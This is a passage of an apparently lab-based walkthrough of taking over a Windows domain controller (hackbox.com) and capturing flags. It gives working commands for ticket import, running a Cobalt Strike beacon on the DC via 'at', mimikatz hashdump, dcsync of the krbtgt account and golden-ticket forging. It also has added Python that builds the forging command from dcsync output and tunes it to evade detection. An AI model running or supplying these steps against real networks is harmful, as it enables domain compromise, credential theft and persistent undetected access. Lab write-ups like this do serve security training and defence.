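CCACHE_VERSIONS = {b"\x05\x04": 4, b"\x05\x03": 3, b"\x05\x02": 2, b"\x05\x01": 1}
# KRB-CRED is DER [APPLICATION 22] constructed (RFC 4120): tag byte 0x60 | 22 = 0x76.
KRB_CRED_TAG = b"\x76"


def identify_ticket_file(data: bytes) -> str:
    """Return 'ccache-v<N>', 'kirbi', 'kirbi-base64' or 'unknown' from the leading bytes."""
    if data[:2] in CCACHE_VERSIONS:
        return f"ccache-v{CCACHE_VERSIONS[data[:2]]}"
    if data[:1] == KRB_CRED_TAG:
        return "kirbi"
    # Tickets are often passed around base64-encoded; strip whitespace, decode, re-check.
    try:
        decoded = base64.b64decode(b"".join(data.split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError: non-alphabet bytes or bad padding
        decoded = b""
    if decoded[:1] == KRB_CRED_TAG:
        return "kirbi-base64"
    return "unknown"


def ccache_default_principal(data: bytes) -> Optional[str]:
    """Parse the default principal (user@REALM) out of a v3/v4 MIT ccache.

    Layout (big-endian): version(2) [v4 only: header_len(2) + header]
    name_type(4) component_count(4) realm(len(4)+bytes) components(len(4)+bytes)...
    Credentials follow, but the principal is enough to confirm whose ticket it is.
    """
    if data[:2] not in (b"\x05\x04", b"\x05\x03"):
        return None
    off = 2
    if data[:2] == b"\x05\x04":
        (hdr_len,) = struct.unpack_from(">H", data, off)
        off += 2 + hdr_len  # skip the tagged header block (DeltaTime etc.)
    _name_type, n_comp = struct.unpack_from(">II", data, off)
    off += 8
    fields = []
    for _ in range(n_comp + 1):  # realm first, then each name component
        (length,) = struct.unpack_from(">I", data, off)
        off += 4
        fields.append(data[off:off + length].decode("utf-8"))
        off += length
    realm, components = fields[0], fields[1:]
    return "/".join(components) + "@" + realm


def _build_sample_ccache(user: str, realm: str) -> bytes:
    """Constructed test input: a v4 ccache header plus a default principal, no credentials."""
    header = b"\x00\x01\x00\x08" + b"\x00" * 8  # one tag: 1 (DeltaTime), 8 zero bytes
    out = b"\x05\x04" + struct.pack(">H", len(header)) + header
    out += struct.pack(">II", 1, 1)  # KRB_NT_PRINCIPAL, one name component
    for field in (realm, user):
        raw = field.encode("utf-8")
        out += struct.pack(">I", len(raw)) + raw
    return out


# Constructed samples: the page elides the user name, so "alice" is a placeholder.
SAMPLE_CCACHE = _build_sample_ccache("alice", "HACKBOX.COM")
SAMPLE_KIRBI = b"\x76\x03\x30\x01\x00"  # a bare DER KRB-CRED shell, not a usable ticket
SAMPLE_KIRBI_B64 = base64.b64encode(SAMPLE_KIRBI)

if __name__ == "__main__":
    for name, blob in (("TGT.ccache", SAMPLE_CCACHE), ("user.ticket", SAMPLE_KIRBI),
                       ("ticket.b64", SAMPLE_KIRBI_B64)):
        print(name, identify_ticket_file(blob), ccache_default_principal(blob))
```

<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:6.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Run it against the real files with open(path, "rb").read(): the input to KrbCredExport should report ccache-v4 (or v3) with the principal you passed to -u, and the file you upload for kerberos_ticket_use should report kirbi.</span><span lang="EN-US"></span>
</p>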
<h5 style="margin-top:0cm;margin-right:0cm;margin-bottom:17.5pt;margin-left:-.25pt;">
<span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.2.9.3. </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">Import the ticket and access </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">dc</span><span lang="EN-US"></span>
</h5>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.85pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Import the ticket (the .kirbi was first uploaded to the web host as C:\user.ticket)</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">kerberos_ticket_use C:\user.ticket</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.75pt;margin-left:1.55pt;margin-right:0cm;margin-top:0cm;">
<img width="503" height="99" src="https://www.2k8.org/content/uploadfile/202203/17/db01fd7b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Access the domain controller </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:42.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="279" src="https://www.2k8.org/content/uploadfile/202203/17/9f3843f6.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21092"></a><span lang="EN-US">5.2.10. </span><span><span style="font-family:宋体;font-weight:normal;">Gain control of the </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">domain controller</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:24.85pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">So far we only have access to the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">domain controller's shares; the next step is to get code execution on </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">itself.</span><span lang="EN-US"></span>
</p>
<h6 style="margin-top:0cm;margin-right:0cm;margin-bottom:9.75pt;margin-left:-.25pt;">
<span lang="EN-US">5.2.10.1. </span><span style="font-family:黑体;font-weight:normal;">Set up an </span><span lang="EN-US">smb </span><span style="font-family:黑体;font-weight:normal;">listener</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:10.35pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="355" src="https://www.2k8.org/content/uploadfile/202203/17/59ceab36.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Generate the payload and choose the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">smb </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">beacon. It is a bind connection: the payload listens on a named pipe and the existing beacon on the web host connects to it over SMB (TCP 445), so the DC needs no outbound path. A reverse connection would require forwarding the DC's traffic back to the team server, which is more work.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:43.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="361" src="https://www.2k8.org/content/uploadfile/202203/17/99ebf280.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h6 style="margin-top:0cm;margin-right:0cm;margin-bottom:4.05pt;margin-left:-.25pt;">
<span lang="EN-US">5.2.10.2. </span><span style="font-family:黑体;font-weight:normal;">Copy the file to the </span><span lang="EN-US">dc </span><span style="font-family:黑体;font-weight:normal;">domain controller and run it</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:6.0pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="308" src="https://www.2k8.org/content/uploadfile/202203/17/543d26e5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">shell at \\dc 15:05:00 c:/aaa.exe</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.65pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Using the ticket imported above, </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">at </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">asks the Task Scheduler service on </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">to run the copied payload as SYSTEM at 15:05 (the DC's local time, so check it first). The </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">at </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">command is deprecated from Windows 8 / Server 2012 onward and refuses to run there; </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">schtasks /s dc /create ... </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is the replacement on newer targets.</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.2.10.3. </span><span style="font-family:黑体;font-weight:normal;">Link to </span><span lang="EN-US">dc </span><span style="font-family:黑体;font-weight:normal;">from the </span><span lang="EN-US">beacon </span><span style="font-family:黑体;font-weight:normal;">(bind connection)</span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">link dc</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:21.85pt;margin-left:1.55pt;margin-right:0cm;margin-top:0cm;">
<img width="491" height="153" src="https://www.2k8.org/content/uploadfile/202203/17/429aab9a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:28.2pt;margin-left:-.25pt;">
<a name="_Toc21093"></a><span lang="EN-US">5.2.11. </span><span><span style="font-family:宋体;font-weight:normal;">Dump </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">passwords and hashes</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">In the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">beacon, enter the command </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">mimikatz hashdump</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:38.6pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="555" height="123" src="https://www.2k8.org/content/uploadfile/202203/17/00091c1b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:106.75pt;margin-bottom:0cm;margin-left:-.25pt;line-height:247%;">
<a name="_Toc21094"></a><span lang="EN-US">5.2.12. Cobalt Strike: </span><span><span style="font-family:宋体;font-weight:normal;">forge a golden ticket</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:247%;margin-bottom:0cm;margin-left:-.25pt;margin-right:106.75pt;margin-top:0cm;text-indent:-.5pt;">
<b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:247%;">5.2.12.1. </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:247%;">Run the command on the domain controller to export the </span><b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:247%;">krbtgt </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:247%;">account's secrets</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">beacon&gt; dcsync hackbox.com hackbox\krbtgt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dcsync </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">asks the DC to replicate the account over the directory replication protocol (DRSUAPI), the same way DCs sync with each other. It needs an account with replication rights (Domain Admins have them) rather than a session on the DC itself, so it also works from the web host. The NTLM hash of </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">krbtgt </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is the key every TGT in the domain is encrypted with, which is what the golden ticket needs.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:41.6pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="347" src="https://www.2k8.org/content/uploadfile/202203/17/e2f89960.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
<span lang="EN-US">5.2.12.2. </span><span style="font-family:黑体;font-weight:normal;">Forge the golden ticket on the </span><span lang="EN-US">web </span><span style="font-family:黑体;font-weight:normal;">host</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="125" src="https://www.2k8.org/content/uploadfile/202203/17/cedc5228.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">mimikatz kerberos::golden /user:moon /domain:hackbox.com /sid:S-1-5-21-2005268815-658469957-1189185684 /krbtgt:6f60ace6accbcb76078ccc0312174e98 /endin:480 /renewmax:10080 /ptt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.65pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/sid </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is the domain SID, i.e. the user SID from the MS14-068 step with its trailing RID (-1103) removed. </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/krbtgt </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is the NTLM hash from dcsync, so the KDC accepts the forged TGT as one of its own. </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/user </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">can be any name; mimikatz defaults the RID to 500 (Administrator). </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/endin </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">and </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/renewmax </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">are in minutes (8 hours and 7 days), which keeps the ticket inside the default Kerberos policy instead of mimikatz's 10-year default. </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/ptt </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">injects the ticket into the current session.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Before forging the ticket, access to </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">fails</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:23.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="216" src="https://www.2k8.org/content/uploadfile/202203/17/e98d0cfd.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">After forging it, access to </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">succeeds</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:43.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="269" src="https://www.2k8.org/content/uploadfile/202203/17/639e090d.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
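<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:6.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The parameters of the golden ticket command are tied to each other and to the earlier steps, and a mistake in any of them shows up only as a failed access to dc. The Python below is an added example, not code from this page or from mimikatz: it pulls the krbtgt SID, NTLM hash and AES keys out of dcsync output, checks that their domain part matches the user SID given to ms14-068.py in 5.2.9.1, and assembles the kerberos::golden command. With prefer_aes=False it reproduces the page's command exactly; by default it uses the AES256 key instead, which yields a TGT of the same encryption type as legitimate ones. The dcsync text is a constructed sample in mimikatz's output layout: the SID and NTLM hash are the page's values, the AES keys are placeholders.</span><span lang="EN-US"></span>
</p>

```python
"""Build the kerberos::golden command from dcsync output and the SID used in the pykek step.

Added example: parses mimikatz lsadump::dcsync output, cross-checks the domain SID
against the user SID from ms14-068.py, and assembles the Beacon mimikatz command.
"""
import re
from typing import Dict, Tuple

# A domain account SID: S-1-5-21-<three domain sub-authorities>-<RID>
ACCOUNT_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")
KRBTGT_RID = 502  # well-known RID of the krbtgt account


def split_sid(sid: str) -> Tuple[str, int]:
    """Split an account SID into (domain SID, RID).

    ms14-068.py took the *user* SID (...-1103); kerberos::golden wants the *domain*
    SID, which is the same string without the trailing RID.
    """
    m = ACCOUNT_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account SID: {sid!r}")
    rid = m.group(1)
    return sid[: -(len(rid) + 1)], int(rid)


def parse_dcsync(text: str) -> Dict[str, str]:
    """Extract the krbtgt SID, NTLM hash and AES keys from mimikatz lsadump::dcsync output."""
    patterns = {
        "sid": r"Object Security ID\s*:\s*(S-1-5-21-[\d-]+)",
        "ntlm": r"Hash NTLM:\s*([0-9a-fA-F]{32})",
        "aes256": r"aes256_hmac\s*\(\d+\)\s*:\s*([0-9a-fA-F]{64})",
        "aes128": r"aes128_hmac\s*\(\d+\)\s*:\s*([0-9a-fA-F]{32})",
    }
    found: Dict[str, str] = {}
    for key, pat in patterns.items():
        m = re.search(pat, text)
        if m:
            found[key] = m.group(1) if key == "sid" else m.group(1).lower()
    if "ntlm" not in found and "aes256" not in found:
        raise ValueError("dcsync output has neither an NTLM hash nor an AES256 key")
    return found


def sid_consistent(user_sid: str, krbtgt_sid: str) -> bool:
    """The domain part of the pykek user SID must equal the domain part of the krbtgt SID."""
    user_domain, _ = split_sid(user_sid)
    krbtgt_domain, krbtgt_rid = split_sid(krbtgt_sid)
    return user_domain == krbtgt_domain and krbtgt_rid == KRBTGT_RID


def golden_ticket_command(user: str, domain: str, domain_sid: str, keys: Dict[str, str],
                          endin_min: int = 480, renewmax_min: int = 10080,
                          prefer_aes: bool = True) -> str:
    """Assemble the Beacon mimikatz command.

    Lifetimes are minutes: 480 = 8 h, 10080 = 7 days, inside the default Kerberos policy
    (10 h TGT, 7 day renewal); mimikatz's default 10-year ticket is a giveaway.
    /aes256 gives a TGT with etype 18 like every legitimate one; /krbtgt (RC4) gives
    etype 23, which stands out on a domain that otherwise uses AES.
    /id is left at mimikatz's default of 500 (Administrator).
    """
    if not 0 < endin_min <= renewmax_min:
        raise ValueError("endin must be positive and not exceed renewmax")
    split_sid(domain_sid + "-" + str(KRBTGT_RID))  # raises if domain_sid is not a domain SID
    parts = ["mimikatz", "kerberos::golden", f"/user:{user}", f"/domain:{domain}",
             f"/sid:{domain_sid}"]
    if prefer_aes and "aes256" in keys:
        parts.append(f"/aes256:{keys['aes256']}")
    else:
        parts.append(f"/krbtgt:{keys['ntlm']}")
    parts += [f"/endin:{endin_min}", f"/renewmax:{renewmax_min}", "/ptt"]
    return " ".join(parts)


# Constructed sample in mimikatz's dcsync layout. SID and NTLM hash are the page's values;
# the AES keys are placeholders, not real key material.
SAMPLE_DCSYNC = """\
[DC] 'hackbox.com' will be the domain
[DC] 'dc.hackbox.com' will be the DC server
[DC] 'hackbox\\krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Object Security ID   : S-1-5-21-2005268815-658469957-1189185684-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 6f60ace6accbcb76078ccc0312174e98
    ntlm- 0: 6f60ace6accbcb76078ccc0312174e98

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : HACKBOX.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
      aes128_hmac       (4096) : 0123456789abcdef0123456789abcdef
"""
PYKEK_USER_SID = "S-1-5-21-2005268815-658469957-1189185684-1103"  # the -s value from 5.2.9.1

if __name__ == "__main__":
    keys = parse_dcsync(SAMPLE_DCSYNC)
    assert sid_consistent(PYKEK_USER_SID, keys["sid"])
    domain_sid, _ = split_sid(PYKEK_USER_SID)
    print(golden_ticket_command("moon", "hackbox.com", domain_sid, keys, prefer_aes=False))
    print(golden_ticket_command("moon", "hackbox.com", domain_sid, keys))
```

<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:6.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Paste the real dcsync output into SAMPLE_DCSYNC (or read it from a file) and run the script; the first printed line is the page's command, the second the AES variant.</span><span lang="EN-US"></span>
</p>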
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.0pt;margin-left:-.25pt;">
<a name="_Toc21095"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">6. FLAG </span></b>capture<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:.5pt;margin-left:-.25pt;">
<a name="_Toc21096"></a><span lang="EN-US">6.1.web flag1</span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="143" src="https://www.2k8.org/content/uploadfile/202203/17/d701436b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:0cm;margin-left:-.25pt;">
<a name="_Toc21097"></a><span lang="EN-US">6.2.web flag2</span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:38.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="145" src="https://www.2k8.org/content/uploadfile/202203/17/652c3241.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:3.75pt;margin-left:-.25pt;">
<a name="_Toc21098"></a><span lang="EN-US">6.3.dc flag3</span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:46.25pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="155" src="https://www.2k8.org/content/uploadfile/202203/17/e9d3c5ba.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:154.3pt;margin-bottom:.25pt;margin-left:-.25pt;line-height:292%;">
<a name="_Toc21099"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">7. </span></b>Follow<span lang="EN-US"></span>
</h1>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:292%;margin-bottom:.25pt;margin-left:-.75pt;margin-right:0cm;margin-top:0cm;tab-stops:center 225.7pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:292%;">Personal WeChat official account:<span lang="EN-US"><span> </span></span>暗月博客 (Moon Blog) official account</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Next time I will bring you a more complex domain environment with more restrictions on the internal network: </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">bypass av</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">, getting past the firewall, and so on.</span><span lang="EN-US"></span>
</p>